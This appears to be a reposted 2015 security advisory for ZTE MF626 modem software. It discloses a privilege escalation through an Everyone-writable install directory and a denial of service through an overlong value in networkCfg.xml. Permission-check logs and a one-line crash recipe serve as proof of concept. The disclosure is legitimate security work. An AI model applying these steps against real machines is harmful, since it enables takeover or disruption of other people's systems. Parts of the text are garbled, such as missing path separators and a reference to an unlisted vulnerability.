Home / exploits ZTE Datacard Telecom MF626 Modem Privilege Escalation
Posted on 10 February 2015
Document Title: =============== ZTE Datacard Telecom MF626 Modem (PCW_TNZNZLV1.0.0B02) - Multiple Vulnerabilities Release Date: ============= 2015-02-09 References (Source): ==================== http://zero-way.net/forum/forum/pentration-testing/exploits/locals/235-zte-datacard-telecom-mf626-modem-pcw_tnznzlv1-0-0b02-multiple-vulnerabilities Product & Service Introduction: =============================== http://www.zte.com.cn http://www.zte.co.nz/main/Product_Downloads/MF626_downloads.htm Affected Product(s): ==================== ZTE Corporation Product: ZTE Datacard Telecom MF626 Modem (PCW_TNZNZLV1.0.0B02) Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ A local privilege escalation vulnerability has been discovered in the official ZTE Datacard Telecom MF626 Modem (PCW_TNZNZLV1.0.0B02) application software. The local security vulnerability allows an attackers to gain higher access privileges by exploitation of a insecure permission misconfiguration. The software suffers from a local privilege escalation vulnerability. Users are able to change the file with executable access to a binary of choice. The issue is located in the misconfigured permissions values with the `F`(full) flag in the users and everyone group. The permissions are set to all the binary files of the software in the same location. The files are installed in the `Ucell Internet` directory. The group/user permission for the path is assigned to the everyone group. The full path with the permission misconfiguration allows local low privileged system user accounts to exploit the vulnerability to gain higher access privileges. After the attacker replaced the binary file with the malicious code he can reboot the system to gain higher access privileges. At the end the attacker is able to fully compromises the system by local exploitation. T The third discovered vulnerability is a denial of service bug that affects the local process. Local attackers are able to manipulate the networkCfg.xml to crash the application with a runtime error that results in a unhandled exception. Proof of Concept (PoC): ======================= The vulnerabilities can be exploited by local attackers with restricted account privileges and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. --- PoC Session Logs Local Privilege Escalation --- C:Userss-dzDesktop>accesschk.exe -dqv "C:Program FilesTelecom Connection Manager" C:Program FilesTelecom Connection Manager Medium Mandatory Level (Default) [No-Write-Up] RW Tout le monde FILE_ALL_ACCESS RW NT SERVICETrustedInstaller FILE_ALL_ACCESS RW AUTORITE NTSystÞme FILE_ALL_ACCESS RW BUILTINAdministrateurs FILE_ALL_ACCESS R BUILTINUtilisateurs FILE_LIST_DIRECTORY FILE_READ_ATTRIBUTES FILE_READ_EA FILE_TRAVERSE SYNCHRONIZE READ_CONTROL C:Userss-dzDesktop> C:Userss-dzDesktop>icacls "C:Program FilesTelecom Connection Manager" C:Program FilesTelecom Connection Manager Tout le monde:(F) Tout le monde:(OI)(CI)(IO)(F) NT SERVICETrustedInstaller:(I)(F) NT SERVICETrustedInstaller:(I)(CI)(IO)(F) AUTORITE NTSystème:(I)(F) AUTORITE NTSystème:(I)(OI)(CI)(IO)(F) BUILTINAdministrateurs:(I)(F) BUILTINAdministrateurs:(I)(OI)(CI)(IO)(F) BUILTINUtilisateurs:(I)(RX) BUILTINUtilisateurs:(I)(OI)(CI)(IO)(GR,GE) CREATEUR PROPRIETAIRE:(I)(OI)(CI)(IO)(F) 1 fichiers correctement traités ; échec du traitement de 0 fichiers C:Userss-dzDesktop> --- PoC Local DoS --- first go to C:program filesInternet Mobile etworkCfg.xml (Network configuration) and write "A" * 3000 in <ConfigFileName>"A" x 3000</ConfigFileName> . Save it open the program . poc will crash ... Credits & Authors: ================== Hadji Samir s-dz@hotmail.fr
